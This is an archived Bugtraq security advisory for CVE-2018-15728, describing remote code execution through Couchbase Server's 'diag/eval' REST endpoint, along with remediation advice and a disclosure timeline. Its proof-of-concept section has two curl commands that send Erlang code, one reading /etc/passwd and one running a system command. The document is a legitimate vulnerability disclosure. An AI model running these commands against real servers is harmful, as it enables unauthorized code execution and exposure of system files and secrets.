[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: Couchbase Server - Remote Code Execution
From: x ksi <s3810 () pjwstk ! edu ! pl>
Date: 2018-08-23 9:22:34
Message-ID: 732f7492-abda-4162-a896-7c686496a0a2 () journal ! report ! generator
[Download RAW message or body]
Sender: s3810@pjwstk.edu.pl
Subject: Couchbase Server - Remote Code Execution
Message-Id: <CAN10O-YorWdFmOh6kZDG1=R6+S5GQTQbSQms0DGjR8pDhr2MFQ@mail.gmail.com>
Recipient: Lanware.Security@lanware.co.uk
______________________________________________________________________
This email and any attachments to it may be confidential and are intended solely for \
the use of the individual to whom it is addressed. Any views or opinions expressed \
are solely those of the author and do not necessarily represent those of Lanware Ltd. \
If you have received this e-mail in error, please notify the sender and delete this \
email (including any attachments) from your system. Lanware may monitor email traffic \
data and content of email for the purpose of security.
Lanware Ltd, 62-64 Cornhill EC3V 3NH. Registered in England and Wales. Registration \
No. 2815552. Telephone +44 (0) 207 150 1100
Received: from GCHQ-GWR-EXCH01.internal.lanware.co.uk (10.80.1.204) by
GCHQ-GWR-EXCH01.internal.lanware.co.uk (10.80.1.204) with Microsoft SMTP
Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
15.1.1466.3; Thu, 23 Aug 2018 09:50:33 +0100
Received: from mail6.bemta25.messagelabs.com (195.245.230.107) by
mail.lanware.co.uk (10.80.1.151) with Microsoft SMTP Server id 15.1.1466.3
via Frontend Transport; Thu, 23 Aug 2018 09:50:33 +0100
Return-Path: bugtraq-return-59704-security=lanware.co.uk@securityfocus.com
Received: from [46.226.52.199] (using TLSv1.2 with cipher DHE-RSA-AES256-GCM-SHA384 \
(256 bits)) by server-3.bemta.az-b.eu-west-1.aws.symcld.net id D1/FA-19860-9557E7B5; \
Thu, 23 Aug 2018 08:50:33 +0000
Authentication-Results: mx.messagelabs.com; spf=pass
(server-10.tower-287.messagelabs.com: domain of securityfocus.com
designates 195.245.230.82 as permitted
sender)smtp.mailfrom=securityfocus.com
X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFmpnk+JIrShJLcpLzFFi42I5/PVZkG5EaV2
0wY9t6hZf/39idmD06Pg2hSWAMYo1My8pvyKBNWPdooyCP4IVLyYFNjD+4u9i5OAQEvCRuHnG
qYuRE8g8ySgx87U/iC0h4CexYPoxFpASCQFHiYffCiDCShItHYvYIWwDiaYXs5ggSkQkJjdZQ
ZhaEnvWQFWIS0xeuJIZYriHxI9fl4EGcgHZKxglTp0/zwTh3GWU+Leonw2iykXiXOs9FhCbV8
BJ4uGO+6wgtoCAgMS/SRfA4jwCOhL3T7UyQ9i6Er8+zmSCsI0kzu7rh6pxkDi58iYjhG0j8fp
RJ1g9i4CJxOqn29ghbFOJUwuWscFcN3XBBrDrJAT+s0m83biXCeIFRYlXE9+xQNgOEi9vLmOE
sBUkVv34xQphW0vsfbKIqIDgAlo7hVli5YMPTBMYtWeBvSkocXLmExYQm1lAU6J1+2/2BYxMq
xgtkooy0zNKchMzc3QNDQx0DQ2NdA0tzYDYWC+xSjdJL7VUtzy1uETXUC+xvFivuDI3OSdFLy
+1ZBMjMDkwAMEOxnPfkg8xSnIwKYnyfvavjRbiS8pPqcxILM6ILyrNSS0+xCjDwaEkwfuxuC5
aSLAoNT21Ii0zB5imYNISHDxKIrx2JUBp3uKCxNzizHSI1ClGY44Xi3omMXP8eT91ErMQS15+
XqqUOK8aSKkASGlGaR7cIFj6vMQoKyXMywh0mhBPQWpRbmYJqvwrRnEORiVh3mqQKTyZeSVw+
14BncIEdAorcy3IKSWJCCmpBkamTZXdLkciO3ffzwwrO/jl6byvpvu+Hw/aMu/3TbF9qQ9F78
w7YqjKG9T2T9REpPjwqRjH8J17/U/9OtUavuv81GKx8iUKYjZXeBhVeG1lNd1WsbXWV+x83DJ
jyeV/G57fVej4suzj9MRzhy60ty4wzGv8tzDLZerEKQ1rM48UXC6czqHDdD5fiaU4I9FQi7mo
OBEAXbB6c5oDAAA=
X-Env-Sender: bugtraq-return-59704-security=lanware.co.uk@securityfocus.c
om
X-Msg-Ref: server-10.tower-287.messagelabs.com!1535014232!7612004!1
X-Originating-IP: [195.245.230.82]
X-SpamReason: No, hits=0.0 required=7.0 tests=
X-StarScan-Received:
X-StarScan-Version: 9.9.15; banners=-,-,-
X-VirusChecked: Checked
Received: (qmail 25673 invoked from network); 23 Aug 2018 08:50:32 -0000
Received: from mail3.bemta25.messagelabs.com (HELO mail3.bemta25.messagelabs.com) \
(195.245.230.82) by server-10.tower-287.messagelabs.com with SMTP; 23 Aug 2018 \
08:50:32 -0000
Received: from [46.226.52.192] (using TLSv1.2 with cipher DHE-RSA-AES256-GCM-SHA384 \
(256 bits)) by server-2.bemta.az-b.eu-west-1.aws.symcld.net id 0F/3F-20055-8557E7B5; \
Thu, 23 Aug 2018 08:50:32 +0000
X-Env-Sender: bugtraq-return-59704-security=lanware.co.uk@securityfocus.c
om
X-Msg-Ref: server-3.tower-280.messagelabs.com!1535014200!71964!76
X-Originating-IP: [34.237.219.205]
X-SYMC-ESS-Client-Auth: outbound-route-from=fail
X-StarScan-Received:
X-StarScan-Version: 9.14.24; banners=-,-,-
X-VirusChecked: Checked
Received: (qmail 20279 invoked from network); 23 Aug 2018 08:50:32 -0000
Received: from ec2-34-237-219-205.compute-1.amazonaws.com (HELO symds.io) \
(34.237.219.205) by server-3.tower-280.messagelabs.com with SMTP; 23 Aug 2018 \
08:50:32 -0000
Received: from lists.securityfocus.com \
(ip-100-122-156-127.us-east-1.ec2.aws.symcpe.net [100.122.156.127]) by symds.io \
(Postfix) with SMTP id B6A9FF1F8 for <security@lanware.co.uk>; Thu, 23 Aug 2018 \
08:42:43 +0000 (UTC)
Received: (qmail 18484 invoked by alias); 23 Aug 2018 08:40:41 -0000
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31427 invoked from network); 23 Aug 2018 05:05:27 -0000
X-Brightmail-Tracker: H4sIAAAAAAAAA+NgFtrJIsWRWlGSWpSXmKPExsXiVRtkqjvNoS7
a4MgLQYvmC+kOjB73z9xiD2CMYs3MS8qvSGDNWLcoo+CPYMWLSYENjL/4uxi5OIQEpjBKHN48
jQnEYRGYwiyx8sEHMEdC4AeLxOJZRxi7GDmBnDqJu90LoewiidbtHSwQdoXE+Wk7wWxeAUGJk
zOfgNlCAmESd76sYAWx2QQUJRoXrmcCsVkEVCXObtrNBlEfIHH17w+wuLCAocTp3onsILaIgJ
XEzgv9YLuYBTSBdv1mn8DINwvJillIUgsYmVYxWiQVZaZnlOQmZuboGhoY6BoaGusa6ppZ6iV
W6SbqpZbqJqfmlRQlAiX1EsuL9Yorc5NzUvTyUks2MQKDjgEIdjDu2ZdyiFGSg0lJlPezf220
EF9SfkplRmJxRnxRaU5q8SFGGQ4OJQleG/u6aCHBotT01Iq0zBxg+MOkJTh4lER4/e2A0rzFB
Ym5xZnpEKlTjJYcLxb1TGLmmLByEpD8837qJGYhlrz8vFQpcV4nkHkCIA0ZpXlw42AxeolRVk
qYlxHoQCGegtSi3MwSVPlXjOIcjErCvBEgU3gy80rgtr4COogJ6CBW5lqQg0oSEVJSDYwzt03
QtJ14XMzAZ50Y25bKsJeHz17xeHTXoSyZ34uf79Ydd6Nvxw3D7dIrz/7rsb8QI/7h4O0VmUYP
ZUV3HppbzZOc6iUtV3c1hU+d7YPttbUu321W1d0Svp10Z9sM4blb7nI4n4wTDPv8zb9QLWCq8
SrOl41PBdi+n62+P6vReO+knw5x7u+UWIozEg21mIuKEwE3eQ/czAIAAA==
X-Env-Sender: s3810@pjwstk.edu.pl
X-Msg-Ref: server-7.tower-221.messagelabs.com!1535000726!43957!1
X-Originating-IP: [74.125.82.53]
X-SpamReason: No, hits=0.0 required=7.0 tests=newsletters:
X-StarScan-Received:
X-StarScan-Version: 9.14.24; banners=-,-,-
X-VirusChecked: Checked
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=pjwstk.edu.pl; s=google;
h=mime-version:from:date:message-id:subject:to;
bh=vQvnD8rapUXqZ28JsES478JWn/b3GD+vFaMJ3PxsHwg=;
b=g0nXtLSEiJ4HjEfSqZ4YU/ALgmvt8N+I6HuJZ3anZwXoW6+pj9tK7JVFxTYzomMwtJ
TyL8ZS90jLmnqYpaI6TuZ3FnrZ8JOUeTwYgofi2eP+FcicGpzX5GXZlbH+MtQaSSupyG
jjg1zJOftfuKCk6UzCuaf1/bMRGEGeEOaRu6w=
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=1e100.net; s=20161025;
h=x-gm-message-state:mime-version:from:date:message-id:subject:to;
bh=vQvnD8rapUXqZ28JsES478JWn/b3GD+vFaMJ3PxsHwg=;
b=jpjZpKXcoyOUoZ3TuPVMSN7XVYHoGA7+ZcGMaSjGtAQNGgU5jRzLQt7Dce7zxVxJ0E
xRY/6uIgYo4IjCUj+n8+6xiqA4zzr6YzWDGLYI4UDhieNsxXWVzX97eOiVTWtOZkhDS6
wcuxHTLEzXZduW7ou0DzTWFly6hOY1uS4W4LKurDVROXN01l0uZ8WNGUZf+A+ctleOof
+2xq4jEBejy2CBBzTzZN7RGAQEZXGzE4dp/SHduxOcroPfngwPCCrKSvHGYYNEhcrf92
Jq/MeWHxs15i+E+2Qt5Y2Vi65FKDV7PwuUEZFnRW00OpuXrHq70Xp74TskT4YorGNNIu
qGVg==
X-Gm-Message-State: APzg51Cxfdrc9P2XPUptdpesPm/PSiADj6BUOxtbigSsMcE6jexQcZFe
XNU8NpBnwuiHRsvsaaxWZPs4R8dGgexU0PhSJZ3WmXeR28o=
X-Google-Smtp-Source: \
ANB0VdaYnLEk/MvDXc5futMFW9N9PesXbJ337wSPXGjGntDJx+gEd0ZtgaQ7ffsmYB+UzySdyxWEiggvju0a1aB+N/Y=
X-Received: by 2002:a1c:578a:: with SMTP id l132-v6mr4126502wmb.16.1535000725643;
Wed, 22 Aug 2018 22:05:25 -0700 (PDT)
MIME-Version: 1.0
From: x ksi <s3810@pjwstk.edu.pl>
Date: Thu, 23 Aug 2018 15:05:25 +1000
Message-ID: <CAN10O-YorWdFmOh6kZDG1=R6+S5GQTQbSQms0DGjR8pDhr2MFQ@mail.gmail.com>
Subject: Couchbase Server - Remote Code Execution
To: <fulldisclosure@seclists.org>, <bugtraq@securityfocus.com>
Content-Type: text/plain; charset="UTF-8"
X-MS-Exchange-Organization-OriginalArrivalTime: 23 Aug 2018 08:50:33.1737
(UTC)
X-MS-Exchange-Organization-Network-Message-Id: 25376e6b-822a-4d5b-fb3f-08d608d57cab
X-MS-Exchange-Organization-OriginalClientIPAddress: 195.245.230.107
X-MS-Exchange-Organization-OriginalServerIPAddress: 10.80.1.151
X-MS-Exchange-Organization-Cross-Premises-Headers-Processed: \
GCHQ-GWR-EXCH01.internal.lanware.co.uk
X-MS-Exchange-Organization-OrderedPrecisionLatencyInProgress: \
LSRV=GCHQ-GWR-EXCH01.internal.lanware.co.uk:TOTAL-FE=0.046|SMR=0.051(SMRPI=0.008(SMRPI-FrontendProxyAgent=0.008));2018-08-23T08:50:33.220Z
X-MS-Exchange-Forest-ArrivalHubServer: GCHQ-GWR-EXCH01.internal.lanware.co.uk
X-MS-Exchange-Organization-AuthSource: GCHQ-GWR-EXCH01.internal.lanware.co.uk
X-MS-Exchange-Organization-AuthAs: Anonymous
X-MS-Exchange-Organization-FromEntityHeader: Internet
X-MS-Exchange-Organization-OriginalSize: 10014
X-MS-Exchange-Organization-HygienePolicy: Standard
X-MS-Exchange-Organization-MessageLatency: \
SRV=GCHQ-GWR-EXCH01.internal.lanware.co.uk:TOTAL-FE=0.062|SMR=0.051(SMRPI=0.008(SMRPI-FrontendProxyAgent=0.008))|SMS=0.016
X-MS-Exchange-Organization-AVStamp-Enterprise: 1.0
X-MS-Exchange-Organization-Recipient-Limit-Verified: True
X-MS-Exchange-Organization-TotalRecipientCount: 1
X-MS-Exchange-Forest-IndexAgent-0: \
AQ0CZW4AAZYGAAAPAAADH4sIAAAAAAAEAK1WXW/bNhSl42+laoc9FN \
ieiOwhLRBZSfqV5WFYkrZoH4oFbVpsy7KAluiYqCR6pGTXG9bftJ+4 \
c0lbcdKuD10RQ6DI+3F47rlX+efrZ3K+FQZh8FjaxKhJqXSxHwZHuk \
rGQ2ElfyXNVBp+unPG5buJttLyl09enfCD4+f8dPeMz8YqGfPhnKdy \
JKqs5MqGgZgKlYlhJrku+MnRcby3/f0OF0Uaa+Ped2hjEAYHVTmWRa \
kSUcqUV1YayxNRcCuLlAszVKURZs6fmEwUFzzRqeSl5pupEhexnIps \
MwxgOdGqKLkecQQjYAN+goWznqks40PJbTW08o8KubI5LiKTihKqgl \
zCoCpSabK5Qg49kUaUtLJzW8ocEcoxnxg1VZm8wO0XaQjr4vIzYek1 \
DQNgs6UwJa/5wx0JywpiXgMmv5FGbroTMBo5kkYWSQ0MuUYqUSILg1 \
QnVQ70ggrET++dnd4/O31wtsXHeiZRoC1+1SLV0habJUjADqKJYh4G \
qhhpk3sDMdRV6ZIYZd9aLqzVSEWsuBuLLNMzokEkibSWIDqqavQICj \
4tBcMlX1PosioQIJtv8efucoUuuVMBnAFkpEy+oAyILRwdmzVX0I2R \
XIxGMiEYkAusJbKaj/OnLNYUP13RH7D8oisnItTEXfBYH6GAeqpSsp \
S4F4HXBjUnZMCiRnOuRnyuK0MsoYZZ5mlCjhoQtIsbDahbjo0Gcgce \
9ZqUaJmdAU8qk/HoGd8gWWuj/nQx9vmhsCrhB4dHjzf4uCwn+3H8bu \
D+9qkP4vpyYRD9zI9/QntFKd9MqP9GkN2+kSI9p9WdjViWSTxBtWbp \
xl1C8Jd+u8UP/+bRD4Cu932F72y8n7wvNrb46VAV6KDzUp+X0uR3Du \
+e3SUGB+ic3S+OWNv9JE/vbMhiunF3k4h6KXMJ43qsQI1JCcqLFGwC \
K0RfG/CLSqUCfA74QQa0EJOaOjkZ6MyopIRCVtV4OYkWo+VjMnH1Ol \
G5zFQhqU57g+2Hg93tnb19/lQvVb5ARAicoeWnD9FdlOSjXQOura2k \
kzmGVUmILKaKUeX8x6Tu/kTnyL+7fT1lVE24zDEkrwSgbAsgKx1jZC \
IxmMNgMXlQpgsUNcPBBD1H8XcG23uL+C8ev5IJn1TDTNkxdVE6VVZj \
hl42vFU5prPh0yorMOyGKgPoMPCjCJ1xMBEJzFxfPj7kp4/OruU4ev \
MEyV33I8PI6Jy/eH7y8gmZ7a5AoT0aLOqigB28IjqIdh482t1zxS/H \
6C9HJLneu3SlmVkjH4OioZQFcmYSrKYDr6zFtLQoKn2eSKcWQp3NZo \
MrFYhxvnt5nmJeZjTmr1ldGaCxdd+9GBVFkjImBUZiovwCsjJ6MC5z \
6B+z+PNC3xu8i0WaqyI+EZjA8bs0MVGuUwyjyMqSvkF2meP+Z+a4P9 \
iJl7KsFxHM8wjUmbn73i+TPPiySTIFw8jabBn/4adqBF4xfVHNOsJ3 \
b1b1+dKJHZwg0KOrgfIULggyqN7GJJ94ey9eiidKptKrbm97+xEqSN \
KOXOp0GGH46JJeUxn5fwroWqQu+myL4q3F/0ZPkX/Cj0WmRBEGjDVZ \
b53d7LOg0+g1GGuwZpf1WqzdbLT9a5t11tzmGmvBDOtmo9VijGxYy7 \
+2GWuzXshuwhibOKKArIvFmnttsW6P9cmYtZrO0W3itHmDhcujdsDW \
a0esvT3Wy7CEBOs+u9F07tiBL448SPxqrx4LwsYtukKjeflkrS7rAy \
eugx+CrLMbPjie8EVMBAQAj8cD67H1kCHUmgPf8rDh3nbZse6zdZeR \
kCB+DWzJG56B961/OG0vr4OnzwgvsOEyekJ6C/Ibga8FDPAEGOy36E \
f8A9ji11jzdfGEY8fbL3YarO/2kb1D8eGLva7L3ncR2rC+uUCC6kMD \
3f+T13PYZMG6I7zjUoNwKg271XOFrkvsaVmqBexBFeuIjpsHLlSL6k \
4uQeOGL6WP5spXK4RKAx3fZv0+cd65FqFDJHQ97bW9I6Tri9VdqtTJ \
oH/N3Wkv8LVzte55TnwFu42+A9a+5tV0jeNk3PswIMkGtPuearRdK3 \
WWsr9uX8vMCTUMGjcXTdpg35KeKVFdNWy+Zj3sOCpakD2B9N29bKvW \
ivHvHxj7+rYdTth3XBevupz/hwvMeq4RqKdW7H/9pL1XyKr9UX0p94 \
TN7cY39elv7rTu/UX1l/x4wF54biJ91XGF6/wLCu0gKycOAAABCt4B \
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTE2Ij8+DQ \
o8RW1haWxTZXQ+DQogIDxWZXJzaW9uPjE1LjAuMC4wPC9WZXJzaW9u \
Pg0KICA8RW1haWxzPg0KICAgIDxFbWFpbCBTdGFydEluZGV4PSIxMz \
U1Ij4NCiAgICAgIDxFbWFpbFN0cmluZz5zZWN1cml0eUBjb3VjaGJh \
c2UuY29tPC9FbWFpbFN0cmluZz4NCiAgICA8L0VtYWlsPg0KICA8L0 \
VtYWlscz4NCjwvRW1haWxTZXQ+AQu2BDw/eG1sIHZlcnNpb249IjEu \
MCIgZW5jb2Rpbmc9InV0Zi0xNiI/Pg0KPFVybFNldD4NCiAgPFZlcn \
Npb24+MTUuMC4wLjA8L1ZlcnNpb24+DQogIDxVcmxzPg0KICAgIDxV \
cmwgU3RhcnRJbmRleD0iMTczOCIgVHlwZT0iVXJsIj4NCiAgICAgID \
xVcmxTdHJpbmc+aHR0cHM6Ly93d3cuY291Y2hiYXNlLmNvbS88L1Vy \
bFN0cmluZz4NCiAgICA8L1VybD4NCiAgICA8VXJsIFN0YXJ0SW5kZX \
g9IjE3NzAiIFR5cGU9IlVybCI+DQogICAgICA8VXJsU3RyaW5nPmh0 \
dHBzOi8vZGV2ZWxvcGVyLmNvdWNoYmFzZS5jb20vZG9jdW1lbnRhdG \
lvbi9zZXJ2ZXIvY3VycmVudC9yZXN0LWFwaS9yZXN0LWludHJvLmh0 \
bWw8L1VybFN0cmluZz4NCiAgICA8L1VybD4NCiAgICA8VXJsIFN0YX \
J0SW5kZXg9IjE4NjEiIFR5cGU9IlVybCI+DQogICAgICA8VXJsU3Ry \
aW5nPmh0dHBzOi8vZGV2ZWxvcGVyLmNvdWNoYmFzZS5jb20vZG9jdW \
1lbnRhdGlvbi9zZXJ2ZXIvMy54L2FkbWluL1Rhc2tzL3hkY3ItbW9k \
aWZ5LXNldHRpbmdzLmh0bWw8L1VybFN0cmluZz4NCiAgICA8L1VybD \
4NCiAgPC9VcmxzPg0KPC9VcmxTZXQ+AQ7PAVJldHJpZXZlck9wZXJh \
dG9yLDEwLDA7UmV0cmlldmVyT3BlcmF0b3IsMTEsMTtQb3N0RG9jUG \
Fyc2VyT3BlcmF0b3IsMTAsMDtQb3N0RG9jUGFyc2VyT3BlcmF0b3Is \
MTEsMDtQb3N0V29yZEJyZWFrZXJEaWFnbm9zdGljT3BlcmF0b3IsMT \
AsMTtQb3N0V29yZEJyZWFrZXJEaWFnbm9zdGljT3BlcmF0b3IsMTEs \
MDtUcmFuc3BvcnRXcml0ZXJQcm9kdWNlciwyMCwzNA==
X-MS-Exchange-Forest-IndexAgent: 1 2704
X-MS-Exchange-Forest-EmailMessageHash: 68A7520F
X-MS-Exchange-Forest-Language: en
Hey,
Description:
Couchbase Server [1] exposes REST API [2] which by default is
available on TCP/8091 and/or TCP/18091.
Authenticated users can send arbitrary Erlang code to 'diag/eval'
endpoint of the API. The code will be subsequently executed in the
underlying operating system with privileges of the user which was used
to start Couchbase.
The 'diag/eval' endpoint was found to be referenced in the official
documentation [3][4][5], however, documentation doesn't contain any
information about the risks associated with allowing access to the
endpoint in question.
Unfortunately, I was not able to confirm which versions of Couchbase
are affected and whether 'diag/eval' endpoint is enabled by default.
You can use the PoC provided below in order to verify if your
installation is affected or not.
Proof of Concept:
1. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval
-X POST -d 'case file:read_file("/etc/passwd") of {ok, B} ->
io:format("~p~n", [binary_to_term(B)]) end.'
2. curl -H "Authorization: Basic ABCD" http://x.x.x.x:8091/diag/eval
-X POST -d 'os:cmd("env")'
Remediation:
Contact vendor for remediation guidance. Alternatively, restrict
access to the REST API and/or 'diag/eval' endpoint.
Timeline:
18.06.2018: Following vendor guidelines [6], the information about the
issue was sent to security@couchbase.com.
20.06.2018: Follow-up email was sent to the vendor to confirm receipt
of the original report.
21.08.2018: MDSec published advisory about the similar vulnerability
found in Apache CouchDB [7].
21.08.2018: CVE requested from MITRE.
22.08.2018: MITRE assigned CVE-2018-15728 for this issue.
23.08.2018: The advisory has been released.
References:
[1] https://www.couchbase.com/
[2] https://developer.couchbase.com/documentation/server/current/rest-api/rest-intro.html
[3] https://developer.couchbase.com/documentation/server/3.x/admin/Tasks/xdcr-modify-settings.html
[4] https://developer.couchbase.com/documentation/server/4.1/security/security-comm-encryption.html
[5] https://developer.couchbase.com/documentation/server/4.1/security/security-client-ssl.html
[6] https://www.couchbase.com/resources/security#VulnerabilityReporting
[7] https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/
Thanks,
Filip Palian
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic